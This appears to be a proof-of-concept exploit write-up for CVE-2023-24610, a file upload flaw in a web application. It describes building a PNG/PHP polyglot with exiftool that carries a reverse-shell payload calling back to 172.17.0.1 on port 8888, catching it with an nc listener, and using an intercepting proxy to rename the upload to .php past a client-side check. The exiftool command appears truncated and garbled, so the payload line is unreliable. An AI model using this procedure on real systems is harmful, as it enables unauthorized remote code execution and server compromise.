This is a proof of concept for CVE-2023-24610
We start by creating a PNG/PHP polyglot with exiftool. The PHP payload (a system() call that spawns a bash reverse shell back to 172.17.0.1 on port 8888) is stored in the image's Comment metadata, so the result is still a valid PNG that also carries executable PHP:

exiftool -Comment="/dev/tcp/172.17.0.1/8888 <&1\''); ?>" avatar.png -o polyglot.php

We then rename the output to a .png extension so it passes the front-end check, which is enforced only in the browser and only inspects the file name.
After that, we start a nc listener on port 8888 (for example nc -lvnp 8888) to catch the shell.
The next step is to log in to the application and click on Setup.
At the bottom of the page there is a practice logo area. We can upload a file using the edit button on the right side.
We click on edit, then on browse, and select the .png file we created in the first step.
Before clicking upload, we make sure the request is intercepted with Burp or a similar proxy. We click upload and, in the intercepted multipart request, change the file name extension from .png to .php. The server accepts whatever extension the request carries, since the only extension check is the client-side one we already passed.
We switch intercept off so the file is uploaded and check the nc listener we started earlier. We have a reverse shell, and the source IP shows it comes from the Docker container running the application.